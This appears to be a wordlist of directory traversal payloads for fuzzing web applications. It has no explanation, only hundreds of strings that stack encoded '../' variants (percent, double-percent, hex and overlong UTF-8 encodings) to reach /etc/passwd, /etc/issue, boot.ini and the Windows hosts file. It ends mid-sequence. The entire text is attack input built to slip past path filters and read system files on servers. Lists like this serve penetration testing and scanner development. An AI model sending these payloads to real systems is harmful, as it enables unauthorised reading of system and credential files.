-%2e.\%2e.\%2e.\%2e.\%2e.\%2e.\boot.ini -%2e.\%2e.\%2e.\%2e.\%2e.\%2e.\windows\system32\drivers\etc\hosts -%2e.%2fetc%2fpasswd -%2e.%2fetc%2fissue -%2e.%2fboot.ini -%2e.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e.%2f%2e.%2fetc%2fpasswd -%2e.%2f%2e.%2fetc%2fissue -%2e.%2f%2e.%2fboot.ini -%2e.%2f%2e.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e.%2f%2e.%2f%2e.%2fetc%2fpasswd -%2e.%2f%2e.%2f%2e.%2fetc%2fissue -%2e.%2f%2e.%2f%2e.%2fboot.ini -%2e.%2f%2e.%2f%2e.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e.%2f%2e.%2f%2e.%2f%2e.%2fetc%2fpasswd -%2e.%2f%2e.%2f%2e.%2f%2e.%2fetc%2fissue -%2e.%2f%2e.%2f%2e.%2f%2e.%2fboot.ini -%2e.%2f%2e.%2f%2e.%2f%2e.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e.%2f%2e.%2f%2e.%2f%2e.%2f%2e.%2fetc%2fpasswd -%2e.%2f%2e.%2f%2e.%2f%2e.%2f%2e.%2fetc%2fissue -%2e.%2f%2e.%2f%2e.%2f%2e.%2f%2e.%2fboot.ini -%2e.%2f%2e.%2f%2e.%2f%2e.%2f%2e.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e.%2f%2e.%2f%2e.%2f%2e.%2f%2e.%2f%2e.%2fetc%2fpasswd -%2e.%2f%2e.%2f%2e.%2f%2e.%2f%2e.%2f%2e.%2fetc%2fissue -%2e.%2f%2e.%2f%2e.%2f%2e.%2f%2e.%2f%2e.%2fboot.ini -%2e.%2f%2e.%2f%2e.%2f%2e.%2f%2e.%2f%2e.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e.%5cetc%5cpasswd -%2e.%5cetc%5cissue -%2e.%5cboot.ini -%2e.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e.%5c%2e.%5cetc%5cpasswd -%2e.%5c%2e.%5cetc%5cissue -%2e.%5c%2e.%5cboot.ini -%2e.%5c%2e.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e.%5c%2e.%5c%2e.%5cetc%5cpasswd -%2e.%5c%2e.%5c%2e.%5cetc%5cissue -%2e.%5c%2e.%5c%2e.%5cboot.ini -%2e.%5c%2e.%5c%2e.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e.%5c%2e.%5c%2e.%5c%2e.%5cetc%5cpasswd -%2e.%5c%2e.%5c%2e.%5c%2e.%5cetc%5cissue -%2e.%5c%2e.%5c%2e.%5c%2e.%5cboot.ini -%2e.%5c%2e.%5c%2e.%5c%2e.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e.%5c%2e.%5c%2e.%5c%2e.%5c%2e.%5cetc%5cpasswd -%2e.%5c%2e.%5c%2e.%5c%2e.%5c%2e.%5cetc%5cissue -%2e.%5c%2e.%5c%2e.%5c%2e.%5c%2e.%5cboot.ini -%2e.%5c%2e.%5c%2e.%5c%2e.%5c%2e.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e.%5c%2e.%5c%2e.%5c%2e.%5c%2e.%5c%2e.%5cetc%5cpasswd -%2e.%5c%2e.%5c%2e.%5c%2e.%5c%2e.%5c%2e.%5cetc%5cissue -%2e.%5c%2e.%5c%2e.%5c%2e.%5c%2e.%5c%2e.%5cboot.ini -%2e.%5c%2e.%5c%2e.%5c%2e.%5c%2e.%5c%2e.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e.0x2fetc0x2fpasswd -%2e.0x2fetc0x2fissue -%2e.0x2fboot.ini -%2e.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%2e.0x2f%2e.0x2fetc0x2fpasswd -%2e.0x2f%2e.0x2fetc0x2fissue -%2e.0x2f%2e.0x2fboot.ini -%2e.0x2f%2e.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%2e.0x2f%2e.0x2f%2e.0x2fetc0x2fpasswd -%2e.0x2f%2e.0x2f%2e.0x2fetc0x2fissue -%2e.0x2f%2e.0x2f%2e.0x2fboot.ini -%2e.0x2f%2e.0x2f%2e.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2fetc0x2fpasswd -%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2fetc0x2fissue -%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2fboot.ini -%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2fetc0x2fpasswd -%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2fetc0x2fissue -%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2fboot.ini -%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2fetc0x2fpasswd -%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2fetc0x2fissue -%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2fboot.ini -%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2f%2e.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%2e.0x5cetc0x5cpasswd -%2e.0x5cetc0x5cissue -%2e.0x5cboot.ini -%2e.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%2e.0x5c%2e.0x5cetc0x5cpasswd -%2e.0x5c%2e.0x5cetc0x5cissue -%2e.0x5c%2e.0x5cboot.ini -%2e.0x5c%2e.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%2e.0x5c%2e.0x5c%2e.0x5cetc0x5cpasswd -%2e.0x5c%2e.0x5c%2e.0x5cetc0x5cissue -%2e.0x5c%2e.0x5c%2e.0x5cboot.ini -%2e.0x5c%2e.0x5c%2e.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5cetc0x5cpasswd -%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5cetc0x5cissue -%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5cboot.ini -%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5cetc0x5cpasswd -%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5cetc0x5cissue -%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5cboot.ini -%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5cetc0x5cpasswd -%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5cetc0x5cissue -%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5cboot.ini -%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5c%2e.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%2e.%252fetc%252fpasswd -%2e.%252fetc%252fissue -%2e.%252fboot.ini -%2e.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%2e.%252f%2e.%252fetc%252fpasswd -%2e.%252f%2e.%252fetc%252fissue -%2e.%252f%2e.%252fboot.ini -%2e.%252f%2e.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%2e.%252f%2e.%252f%2e.%252fetc%252fpasswd -%2e.%252f%2e.%252f%2e.%252fetc%252fissue -%2e.%252f%2e.%252f%2e.%252fboot.ini -%2e.%252f%2e.%252f%2e.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%2e.%252f%2e.%252f%2e.%252f%2e.%252fetc%252fpasswd -%2e.%252f%2e.%252f%2e.%252f%2e.%252fetc%252fissue -%2e.%252f%2e.%252f%2e.%252f%2e.%252fboot.ini -%2e.%252f%2e.%252f%2e.%252f%2e.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%2e.%252f%2e.%252f%2e.%252f%2e.%252f%2e.%252fetc%252fpasswd -%2e.%252f%2e.%252f%2e.%252f%2e.%252f%2e.%252fetc%252fissue -%2e.%252f%2e.%252f%2e.%252f%2e.%252f%2e.%252fboot.ini -%2e.%252f%2e.%252f%2e.%252f%2e.%252f%2e.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%2e.%252f%2e.%252f%2e.%252f%2e.%252f%2e.%252f%2e.%252fetc%252fpasswd -%2e.%252f%2e.%252f%2e.%252f%2e.%252f%2e.%252f%2e.%252fetc%252fissue -%2e.%252f%2e.%252f%2e.%252f%2e.%252f%2e.%252f%2e.%252fboot.ini -%2e.%252f%2e.%252f%2e.%252f%2e.%252f%2e.%252f%2e.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%2e.%255cetc%255cpasswd -%2e.%255cetc%255cissue -%2e.%255cboot.ini -%2e.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%2e.%255c%2e.%255cetc%255cpasswd -%2e.%255c%2e.%255cetc%255cissue -%2e.%255c%2e.%255cboot.ini -%2e.%255c%2e.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%2e.%255c%2e.%255c%2e.%255cetc%255cpasswd -%2e.%255c%2e.%255c%2e.%255cetc%255cissue -%2e.%255c%2e.%255c%2e.%255cboot.ini -%2e.%255c%2e.%255c%2e.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%2e.%255c%2e.%255c%2e.%255c%2e.%255cetc%255cpasswd -%2e.%255c%2e.%255c%2e.%255c%2e.%255cetc%255cissue -%2e.%255c%2e.%255c%2e.%255c%2e.%255cboot.ini -%2e.%255c%2e.%255c%2e.%255c%2e.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%2e.%255c%2e.%255c%2e.%255c%2e.%255c%2e.%255cetc%255cpasswd -%2e.%255c%2e.%255c%2e.%255c%2e.%255c%2e.%255cetc%255cissue -%2e.%255c%2e.%255c%2e.%255c%2e.%255c%2e.%255cboot.ini -%2e.%255c%2e.%255c%2e.%255c%2e.%255c%2e.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%2e.%255c%2e.%255c%2e.%255c%2e.%255c%2e.%255c%2e.%255cetc%255cpasswd -%2e.%255c%2e.%255c%2e.%255c%2e.%255c%2e.%255c%2e.%255cetc%255cissue -%2e.%255c%2e.%255c%2e.%255c%2e.%255c%2e.%255c%2e.%255cboot.ini -%2e.%255c%2e.%255c%2e.%255c%2e.%255c%2e.%255c%2e.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%2e.%c0%2fetc%c0%2fpasswd -%2e.%c0%2fetc%c0%2fissue -%2e.%c0%2fboot.ini -%2e.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%2e.%c0%2f%2e.%c0%2fetc%c0%2fpasswd -%2e.%c0%2f%2e.%c0%2fetc%c0%2fissue -%2e.%c0%2f%2e.%c0%2fboot.ini -%2e.%c0%2f%2e.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fetc%c0%2fpasswd -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fetc%c0%2fissue -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fboot.ini -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fetc%c0%2fpasswd -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fetc%c0%2fissue -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fboot.ini -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fetc%c0%2fpasswd -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fetc%c0%2fissue -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fboot.ini -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fetc%c0%2fpasswd -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fetc%c0%2fissue -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fboot.ini -%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2f%2e.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%2e.%c0%afetc%c0%afpasswd -%2e.%c0%afetc%c0%afissue -%2e.%c0%afboot.ini -%2e.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%2e.%c0%af%2e.%c0%afetc%c0%afpasswd -%2e.%c0%af%2e.%c0%afetc%c0%afissue -%2e.%c0%af%2e.%c0%afboot.ini -%2e.%c0%af%2e.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%2e.%c0%af%2e.%c0%af%2e.%c0%afetc%c0%afpasswd -%2e.%c0%af%2e.%c0%af%2e.%c0%afetc%c0%afissue -%2e.%c0%af%2e.%c0%af%2e.%c0%afboot.ini -%2e.%c0%af%2e.%c0%af%2e.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%afetc%c0%afpasswd -%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%afetc%c0%afissue -%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%afboot.ini -%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%afetc%c0%afpasswd -%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%afetc%c0%afissue -%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%afboot.ini -%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%afetc%c0%afpasswd -%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%afetc%c0%afissue -%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%afboot.ini -%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%af%2e.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%2e.%c0%5cetc%c0%5cpasswd -%2e.%c0%5cetc%c0%5cissue -%2e.%c0%5cboot.ini -%2e.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%2e.%c0%5c%2e.%c0%5cetc%c0%5cpasswd -%2e.%c0%5c%2e.%c0%5cetc%c0%5cissue -%2e.%c0%5c%2e.%c0%5cboot.ini -%2e.%c0%5c%2e.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cetc%c0%5cpasswd -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cetc%c0%5cissue -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cboot.ini -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cetc%c0%5cpasswd -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cetc%c0%5cissue -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cboot.ini -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cetc%c0%5cpasswd -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cetc%c0%5cissue -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cboot.ini -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cetc%c0%5cpasswd -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cetc%c0%5cissue -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cboot.ini -%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5c%2e.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%2e.%c1%9cetc%c1%9cpasswd -%2e.%c1%9cetc%c1%9cissue -%2e.%c1%9cboot.ini -%2e.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%2e.%c1%9c%2e.%c1%9cetc%c1%9cpasswd -%2e.%c1%9c%2e.%c1%9cetc%c1%9cissue -%2e.%c1%9c%2e.%c1%9cboot.ini -%2e.%c1%9c%2e.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cetc%c1%9cpasswd -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cetc%c1%9cissue -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cboot.ini -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cetc%c1%9cpasswd -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cetc%c1%9cissue -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cboot.ini -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cetc%c1%9cpasswd -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cetc%c1%9cissue -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cboot.ini -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cetc%c1%9cpasswd -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cetc%c1%9cissue -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cboot.ini -%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9c%2e.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%2e.%c1%pcetc%c1%pcpasswd -%2e.%c1%pcetc%c1%pcissue -%2e.%c1%pcboot.ini -%2e.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%2e.%c1%pc%2e.%c1%pcetc%c1%pcpasswd -%2e.%c1%pc%2e.%c1%pcetc%c1%pcissue -%2e.%c1%pc%2e.%c1%pcboot.ini -%2e.%c1%pc%2e.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcetc%c1%pcpasswd -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcetc%c1%pcissue -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcboot.ini -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcetc%c1%pcpasswd -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcetc%c1%pcissue -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcboot.ini -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcetc%c1%pcpasswd -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcetc%c1%pcissue -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcboot.ini -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcetc%c1%pcpasswd -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcetc%c1%pcissue -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcboot.ini -%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pc%2e.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%2e.%c0%9vetc%c0%9vpasswd -%2e.%c0%9vetc%c0%9vissue -%2e.%c0%9vboot.ini -%2e.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%2e.%c0%9v%2e.%c0%9vetc%c0%9vpasswd -%2e.%c0%9v%2e.%c0%9vetc%c0%9vissue -%2e.%c0%9v%2e.%c0%9vboot.ini -%2e.%c0%9v%2e.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vetc%c0%9vpasswd -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vetc%c0%9vissue -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vboot.ini -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vetc%c0%9vpasswd -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vetc%c0%9vissue -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vboot.ini -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vetc%c0%9vpasswd -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vetc%c0%9vissue -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vboot.ini -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vetc%c0%9vpasswd -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vetc%c0%9vissue -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vboot.ini -%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9v%2e.%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%2e.%c0%qfetc%c0%qfpasswd -%2e.%c0%qfetc%c0%qfissue -%2e.%c0%qfboot.ini -%2e.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%2e.%c0%qf%2e.%c0%qfetc%c0%qfpasswd -%2e.%c0%qf%2e.%c0%qfetc%c0%qfissue -%2e.%c0%qf%2e.%c0%qfboot.ini -%2e.%c0%qf%2e.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfetc%c0%qfpasswd -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfetc%c0%qfissue -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfboot.ini -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfetc%c0%qfpasswd -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfetc%c0%qfissue -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfboot.ini -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfetc%c0%qfpasswd -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfetc%c0%qfissue -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfboot.ini -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfetc%c0%qfpasswd -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfetc%c0%qfissue -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfboot.ini -%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qf%2e.%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%2e.%c1%8setc%c1%8spasswd -%2e.%c1%8setc%c1%8sissue -%2e.%c1%8sboot.ini -%2e.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%2e.%c1%8s%2e.%c1%8setc%c1%8spasswd -%2e.%c1%8s%2e.%c1%8setc%c1%8sissue -%2e.%c1%8s%2e.%c1%8sboot.ini -%2e.%c1%8s%2e.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8setc%c1%8spasswd -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8setc%c1%8sissue -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8sboot.ini -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8setc%c1%8spasswd -%2e.%c1%8s%2e.%c1%8s%2e.%c1%8s%2e.%c1%8setc%c1%8sissue 